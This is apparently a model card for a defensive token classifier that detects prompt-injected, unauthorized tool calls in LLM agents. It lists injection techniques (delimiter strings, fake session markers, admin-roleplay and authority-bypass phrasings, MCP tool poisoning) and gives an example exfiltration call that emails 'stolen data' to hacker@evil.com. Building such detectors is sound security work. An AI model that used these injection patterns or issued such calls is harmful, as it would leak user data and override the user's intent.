ToolCallVerifier - Unauthorized Tool Call Detection
🎯 What This Model Does
ToolCallVerifier is a ModernBERT-based token classifier that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
| Label | Description |
|---|---|
| AUTHORIZED | Token is part of a legitimate, user-requested action |
| UNAUTHORIZED | Token indicates injected or malicious content (BLOCK) |
📊 Performance
| Metric | Value |
|---|---|
| UNAUTHORIZED F1 | 93.50% |
| UNAUTHORIZED Precision | 95.01% |
| UNAUTHORIZED Recall | 92.05% |
| Overall Accuracy | 92.88% |
Confusion Matrix (Token-Level)
| | Predicted AUTH | Predicted UNAUTH |
|---|---|---|
| Actual AUTH | 130,708 | 8,483 |
| Actual UNAUTH | 13,924 | 161,031 |
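As a sanity check, the reported metrics can be recomputed from the token-level confusion matrix. The sketch below treats UNAUTHORIZED as the positive class; the helper name `binary_metrics` is illustrative and not part of the model's code. The recomputed values should agree with the table to within a few hundredths of a percentage point, with the small differences presumably due to rounding.

```python
def binary_metrics(tp: int, fp: int, fn: int, tn: int) -> dict:
    """Precision, recall, F1 for the positive class, plus overall accuracy."""
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    f1 = 2 * precision * recall / (precision + recall)
    accuracy = (tp + tn) / (tp + fp + fn + tn)
    return {"precision": precision, "recall": recall, "f1": f1, "accuracy": accuracy}


# Counts from the confusion matrix, with UNAUTHORIZED as the positive class:
#   tp = actual UNAUTH predicted UNAUTH, fp = actual AUTH predicted UNAUTH,
#   fn = actual UNAUTH predicted AUTH,   tn = actual AUTH predicted AUTH.
metrics = binary_metrics(tp=161_031, fp=8_483, fn=13_924, tn=130_708)

for name, value in metrics.items():
    print(f"{name}: {value:.2%}")
```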
🗂️ Training Data
Trained on ~30,000 samples combining real-world attacks and synthetic patterns:
HuggingFace Datasets
| Dataset | Description | Samples |
|---|---|---|
| LLMail-Inject | Microsoft email injection benchmark | ~10,000 |
| WildJailbreak | Allen AI adversarial safety dataset | ~8,000 |
| HackAPrompt | EMNLP'23 injection competition | ~5,000 |
| JailbreakBench | Harmful behavior patterns | ~2,000 |
Synthetic Attack Generators
| Generator | Description |
|---|---|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
| Filesystem | File/directory operation attacks |
| Network | Network/API exfiltration attacks |
| Email | Email tool hijacking |
| Financial | Transaction manipulation |
| Code Execution | Code injection attacks |
| Authentication | Access control bypass |
| MCP Attacks | Tool poisoning, shadowing, rug pulls |
🚨 Attack Categories Covered
| Category | Source | Description |
|---|---|---|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}]])` |
| Word Obfuscation | LLMail | Inserting noise words between tokens |
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
| Intent Mismatch | Synthetic | User asks X, tool does Y |
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
| MCP Shadowing | Synthetic | Fake authorization context |
💻 Usage
```python
from transformers import AutoTokenizer, AutoModelForTokenClassification
import torch

model_name = "rootfs/tool-call-verifier"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForTokenClassification.from_pretrained(model_name)

# Example: verify a tool call against the user's stated intent
user_intent = "Summarize my emails"
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'

# Combine intent and tool call into a single input for classification
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)

# Run inference without tracking gradients
with torch.no_grad():
    outputs = model(**inputs)
    predictions = torch.argmax(outputs.logits, dim=-1)

# Map each token's predicted class id to its label
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
labels = [id2label[p.item()] for p in predictions[0]]

# Check for unauthorized tokens
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
if unauthorized_tokens:
    print("⚠️ BLOCKED: Unauthorized tool call detected!")
    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
else:
    print("✅ Tool call authorized")
```
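The flagged tokens printed above are subword pieces, which can be hard to read in logs. One possible way to report which parts of the input were flagged is to request character offsets from the tokenizer (`return_offsets_mapping=True`, available on fast tokenizers) and merge consecutive flagged tokens into character spans. The helper below is a hypothetical sketch, not part of the model's code; it uses hand-written offsets and labels so it runs without downloading the model.

```python
from typing import List, Tuple


def merge_flagged_spans(
    offsets: List[Tuple[int, int]],
    labels: List[str],
    flagged: str = "UNAUTHORIZED",
) -> List[Tuple[int, int]]:
    """Merge runs of consecutive flagged tokens into (start, end) character spans."""
    spans = []
    current = None  # span currently being extended, as [start, end]
    for (start, end), label in zip(offsets, labels):
        if start == end:
            # Special tokens carry an empty offset such as (0, 0); skip them.
            continue
        if label == flagged:
            if current is None:
                current = [start, end]
            else:
                current[1] = end
        elif current is not None:
            spans.append((current[0], current[1]))
            current = None
    if current is not None:
        spans.append((current[0], current[1]))
    return spans


# Hand-written example standing in for real tokenizer and model output.
text = "to: hacker@evil.com ok"
offsets = [(0, 0), (0, 2), (2, 3), (4, 10), (10, 11), (11, 15), (15, 19), (20, 22), (0, 0)]
labels = ["AUTHORIZED"] * 3 + ["UNAUTHORIZED"] * 4 + ["AUTHORIZED"] * 2

flagged_spans = merge_flagged_spans(offsets, labels)
flagged_text = [text[start:end] for start, end in flagged_spans]
print(flagged_text)
```

With real model output, `offsets` would come from `tokenizer(input_text, return_offsets_mapping=True)["offset_mapping"]` and `labels` from the prediction step above.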
⚙️ Training Configuration
| Parameter | Value |
|---|---|
| Base Model | answerdotai/ModernBERT-base |
| Max Length | 512 tokens |
| Batch Size | 32 |
| Epochs | 5 |
| Learning Rate | 3e-5 |
| Loss | CrossEntropyLoss (class-weighted) |
| Class Weights | [0.5, 3.0] (AUTHORIZED, UNAUTHORIZED) |
| Attention | SDPA (Flash Attention) |
| Hardware | AMD Instinct MI300X (ROCm) |
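To illustrate what the class weights do, here is a minimal pure-Python sketch of class-weighted cross-entropy. It assumes the weighted-mean reduction that `torch.nn.CrossEntropyLoss` applies when a `weight` tensor is given (the sum of weighted per-token losses divided by the sum of the weights of the target classes). The training script itself is not shown in this card, so the function name and the toy logits are illustrative only.

```python
import math
from typing import List, Sequence


def weighted_cross_entropy(
    logits: List[Sequence[float]],
    targets: List[int],
    class_weights: Sequence[float],
) -> float:
    """Class-weighted cross-entropy with weighted-mean reduction."""
    total, weight_sum = 0.0, 0.0
    for row, target in zip(logits, targets):
        # Numerically stable log-sum-exp over the class logits.
        peak = max(row)
        log_z = peak + math.log(sum(math.exp(x - peak) for x in row))
        nll = log_z - row[target]  # negative log-likelihood of the true class
        weight = class_weights[target]
        total += weight * nll
        weight_sum += weight
    return total / weight_sum


# Two tokens, both scored as AUTHORIZED (class 0) by a toy model;
# the second token is actually UNAUTHORIZED (class 1).
toy_logits = [[2.0, 0.0], [2.0, 0.0]]
toy_targets = [0, 1]

unweighted = weighted_cross_entropy(toy_logits, toy_targets, [1.0, 1.0])
weighted = weighted_cross_entropy(toy_logits, toy_targets, [0.5, 3.0])
print(f"unweighted: {unweighted:.4f}, weighted: {weighted:.4f}")
```

With weights of `[0.5, 3.0]`, the missed UNAUTHORIZED token dominates the loss, which pushes training toward higher recall on the UNAUTHORIZED class.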
🔗 Integration with FunctionCallSentinel
This model is Stage 2 of a two-stage defense pipeline:
```
┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
│                 │     │      (Stage 1)       │     │                 │
└─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                              │
                               ┌──────────────────────────────▼──────────────────────────┐
                               │              ToolCallVerifier (This Model)              │
                               │     Token-level verification before tool execution      │
                               └─────────────────────────────────────────────────────────┘
```
| Scenario | Recommendation |
|---|---|
| General chatbot | Stage 1 only |
| Tool-calling agent (low risk) | Stage 1 only |
| Tool-calling agent (high risk) | Both stages |
| Email/file system access | Both stages |
| Financial transactions | Both stages |
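The control flow of the two-stage pipeline can be sketched as follows. All callables here (`stage1_allows`, `plan_tool_call`, `stage2_allows`, `execute_tool`) are hypothetical placeholders for the Stage 1 classifier, the LLM, this model, and the tool runtime; the card does not define such an API, so treat this as one possible wiring rather than the reference integration.

```python
from typing import Any, Callable, Dict


def run_guarded(
    user_prompt: str,
    *,
    both_stages: bool,
    stage1_allows: Callable[[str], bool],
    plan_tool_call: Callable[[str], str],
    stage2_allows: Callable[[str, str], bool],
    execute_tool: Callable[[str], Any],
) -> Dict[str, Any]:
    """Screen the prompt (Stage 1), then verify the tool call (Stage 2) before executing it."""
    if not stage1_allows(user_prompt):
        return {"status": "blocked", "stage": 1}
    tool_call = plan_tool_call(user_prompt)  # the LLM proposes a tool call
    if both_stages and not stage2_allows(user_prompt, tool_call):
        return {"status": "blocked", "stage": 2}
    return {"status": "executed", "result": execute_tool(tool_call)}


# Stub components for demonstration only.
injected_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}'
stubs = dict(
    stage1_allows=lambda prompt: True,
    plan_tool_call=lambda prompt: injected_call,
    stage2_allows=lambda prompt, call: "send_email" not in call,
    execute_tool=lambda call: "done",
)

high_risk = run_guarded("Summarize my emails", both_stages=True, **stubs)
low_risk = run_guarded("Summarize my emails", both_stages=False, **stubs)
print(high_risk)
print(low_risk)
```

In this toy run, the injected `send_email` call is stopped only when both stages are enabled, which mirrors the recommendation to use both stages for high-risk agents.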
🎯 Intended Use
Primary Use Cases
- LLM Agent Security: Verify tool calls before execution
- Prompt Injection Defense: Detect unauthorized actions from injected prompts
- API Gateway Protection: Filter malicious tool calls at infrastructure level
Out of Scope
- General text classification
- Non-tool-calling scenarios
- Languages other than English
⚠️ Limitations
- Tool schema dependent: Best performance when the tool schema is included in the input
- English only: Not tested on other languages
- Binary classification: No "suspicious" intermediate category (by design, for decisiveness)
📜 License
Apache 2.0
🔗 Links
- Stage 1 Model: rootfs/function-call-sentinel